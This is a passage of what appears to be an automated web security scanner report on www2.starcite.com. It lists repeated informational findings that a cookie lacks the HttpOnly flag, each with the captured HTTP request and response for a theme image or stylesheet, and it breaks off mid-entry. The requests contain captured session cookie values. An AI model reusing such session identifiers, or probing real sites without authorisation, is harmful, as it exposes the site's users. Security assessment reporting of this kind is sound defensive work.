The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/left_bdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:30 GMT
Server: Apache
Last-Modified: Tue, 19 Aug 2008 18:48:00 GMT
ETag: "1000000002cee-4d-454d486e81800"
Accept-Ranges: bytes
Content-Length: 77
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:56 GMT;path=/

GIF89a..M............................!.......,......M....X.....I'....w..G.    .;

2.141. http://www2.starcite.com/starcite/themes/garland/images/link-cust-login.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/link-cust-login.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/link-cust-login.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:22 GMT
Server: Apache
Last-Modified: Fri, 01 Aug 2008 19:16:00 GMT
ETag: "1000000002cf3-d91-4536ad1e61c00"
Accept-Ranges: bytes
Content-Length: 3473
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:47 GMT;path=/

GIF89a|.....................fff...............................................................................................................uuu............nnn........................................
...[SNIP]...

2.142. http://www2.starcite.com/starcite/themes/garland/images/new-bg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/new-bg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/new-bg.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:20 GMT
Server: Apache
Last-Modified: Wed, 24 Sep 2008 01:10:00 GMT
ETag: "1000000002cfe-13b8-45799f17daa00"
Accept-Ranges: bytes
Content-Length: 5048
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:46 GMT;path=/

GIF89a...'....~.r.............)$.......................(....................,........N.....Z..@..7........F../..).....:..3..............d..........*..............;..C..\.....J....._..............2...
...[SNIP]...

2.143. http://www2.starcite.com/starcite/themes/garland/images/right_bdr.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/right_bdr.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/right_bdr.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:30 GMT
Server: Apache
Last-Modified: Tue, 19 Aug 2008 18:48:00 GMT
ETag: "1000000002d07-70-454d486e81800"
Accept-Ranges: bytes
Content-Length: 112
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:56 GMT;path=/

GIF89a..M....................................................!.......,......M....p.F..L..K..&.Ii.G.....D.......;

2.144. http://www2.starcite.com/starcite/themes/garland/images/secondarymenuactive.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/secondarymenuactive.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/secondarymenuactive.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:40 GMT
Server: Apache
Last-Modified: Fri, 01 Aug 2008 19:16:00 GMT
ETag: "1000000002d0e-69-4536ad1e61c00"
Accept-Ranges: bytes
Content-Length: 105
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/

GIF89a..&............................!.......,......&....X...0.I..8....`(.$... .(.....p..tm....9......    .;

2.145. http://www2.starcite.com/starcite/themes/garland/images/section_btm.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/section_btm.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/section_btm.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:44 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002d10-ea-455110eec1300"
Accept-Ranges: bytes
Content-Length: 234
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:10 GMT;path=/

GIF89a.........|..{.....z..............z..~.....z..|...........{..............}..z..............y..|.........!.......,..........g ..di.h..l..p,.4.u..|.....H,..H_..l:.P"@c.Z.....!.....wxx&..x.n."..g~.
...[SNIP]...

2.146. http://www2.starcite.com/starcite/themes/garland/images/section_btm_blue.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/section_btm_blue.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/section_btm_blue.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:44 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002d11-69d-455110eec1300"
Accept-Ranges: bytes
Content-Length: 1693
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:10 GMT;path=/

......JFIF.....d.d......Ducky.......Z......Adobe.d......................................................................................................................................................
...[SNIP]...

2.147. http://www2.starcite.com/starcite/themes/garland/images/section_top.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/section_top.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/section_top.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:43 GMT
Server: Apache
Last-Modified: Tue, 19 Aug 2008 18:48:00 GMT
ETag: "1000000002d14-1bbf-454d486e81800"
Accept-Ranges: bytes
Content-Length: 7103
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:09 GMT;path=/

GIF89a.........................................................z..................................................................................................}..~..{..|.....z........~...........{.
...[SNIP]...

2.148. http://www2.starcite.com/starcite/themes/garland/images/section_top_blue.jpg  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/section_top_blue.jpg

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/section_top_blue.jpg HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:44 GMT
Server: Apache
Last-Modified: Fri, 22 Aug 2008 19:01:00 GMT
ETag: "1000000002d15-fc2-455110eec1300"
Accept-Ranges: bytes
Content-Length: 4034
Content-Type: image/jpeg
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:10 GMT;path=/

......JFIF.....d.d......Ducky.......Z......Adobe.d......................................................................................................................................................
...[SNIP]...

2.149. http://www2.starcite.com/starcite/themes/garland/images/separator_top.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/separator_top.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/separator_top.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:40 GMT
Server: Apache
Last-Modified: Wed, 03 Sep 2008 00:38:00 GMT
ETag: "1000000002d18-331-455f30c61ea00"
Accept-Ranges: bytes
Content-Length: 817
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

2.150. http://www2.starcite.com/starcite/themes/garland/images/site_topbg.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/site_topbg.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/site_topbg.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:20 GMT
Server: Apache
Last-Modified: Wed, 13 Aug 2008 19:12:00 GMT
ETag: "1000000002d19-2e-4545c29b08000"
Accept-Ranges: bytes
Content-Length: 46
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:46 GMT;path=/

GIF89a.........)..v!.......,........@.....g..;

2.151. http://www2.starcite.com/starcite/themes/garland/images/spacer.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/spacer.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/spacer.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:40 GMT
Server: Apache
Last-Modified: Wed, 13 Aug 2008 19:12:00 GMT
ETag: "1000000002d1a-2b-4545c29b08000"
Accept-Ranges: bytes
Content-Length: 43
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:06 GMT;path=/

GIF89a.............!.......,...........D..;

2.152. http://www2.starcite.com/starcite/themes/garland/images/tableftF.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/tableftF.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/tableftF.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:22 GMT
Server: Apache
Last-Modified: Fri, 01 Aug 2008 19:16:00 GMT
ETag: "1000000002d1e-15b-4536ad1e61c00"
Accept-Ranges: bytes
Content-Length: 347
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:48 GMT;path=/

GIF89a..>..*..............................................(..F.............v......b..^..f....x..............W.....................g.....................................................................
...[SNIP]...

2.153. http://www2.starcite.com/starcite/themes/garland/images/tabrightF.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/images/tabrightF.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/images/tabrightF.gif HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:23 GMT
Server: Apache
Last-Modified: Fri, 01 Aug 2008 19:16:00 GMT
ETag: "1000000002d1f-42b-4536ad1e61c00"
Accept-Ranges: bytes
Content-Length: 1067
Content-Type: image/gif
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:49 GMT;path=/

GIF89a..>..(.g..............................................v..)...F...........(................W........x..............................................................................................
...[SNIP]...

2.154. http://www2.starcite.com/starcite/themes/garland/print.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/print.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/print.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:17 GMT
Server: Apache
Last-Modified: Wed, 18 Apr 2007 16:09:00 GMT
ETag: "1000000002c33-4e8-42e654de0df00"
Accept-Ranges: bytes
Content-Length: 1256
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:43 GMT;path=/

/* $Id: print.css,v 1.1.2.1 2007/04/18 03:38:59 drumm Exp $ */

/**
* Themetastic, for Drupal 5.0
* Stefan Nagtegaal, iStyledThis [dot] nl
* Steven Wittens, acko [dot] net`
*
* If you use a custo
...[SNIP]...

2.155. http://www2.starcite.com/starcite/themes/garland/promo-rotation2.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/promo-rotation2.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/promo-rotation2.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:57:17 GMT
Server: Apache
Last-Modified: Sun, 25 Apr 2010 20:32:45 GMT
ETag: "10000000031a0-a03-485159015d540"
Accept-Ranges: bytes
Content-Length: 2563
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:19:43 GMT;path=/

/*body { background-color: #ffffff; margin:0px; padding:0px;}*//*img { border:0px;}*//*div { margin:0px; padding:0px; font-family:verdana; font-size:12px;}*/#big-pic
...[SNIP]...

2.156. http://www2.starcite.com/starcite/themes/garland/starcite.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/starcite.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/starcite.css HTTP/1.1
Host: www2.starcite.com
Proxy-Connection: keep-alive
Referer: http://www2.starcite.com/starcite/whatwedo/overview
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: has_js=1; SITESERVER=GUID=f76247131a65e483501712736841048f; SESS4c44a5ca224f313a096fc40a23069fcb=vo6nc75b0j9t0mbq7e0372jdk1; _mkto_trk=id:166-PPT-545&token:_mch-starcite.com-1293976608338-65039; __utmz=174720036.1293976610.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=174720036.244046565.1293976610.1293976610.1293976610.1; __utmc=174720036; __utmb=174720036.1.10.1293976610; NSC_Pvutjef-NluXfc-IUUQ=e24722583660

Response

HTTP/1.1 200 OK
Date: Sun, 02 Jan 2011 13:59:35 GMT
Server: Apache
Last-Modified: Tue, 31 Mar 2009 16:28:27 GMT
ETag: "1000000002c36-41ed-4666cb04b830a"
Accept-Ranges: bytes
Content-Length: 16877
Content-Type: text/css
Set-Cookie: NSC_Pvutjef-NluXfc-IUUQ=e24722583660;expires=Sun, 02-Jan-11 14:22:00 GMT;path=/

@charset "utf-8";
/* CSS Document */
/*Depricated CSS Starts*/

*
{
   font-family:Arial, Helvetica, sans-serif;
   font-size:12px;
}
.wrapper
{
   text-align:left;
   margin:0 auto;
   width:970px
...[SNIP]...

2.157. http://www2.starcite.com/starcite/themes/garland/style.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www2.starcite.com
Path:   /starcite/themes/garland/style.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /starcite/themes/garland/style.css HTTP/1.1
Host: www2.starcite.com
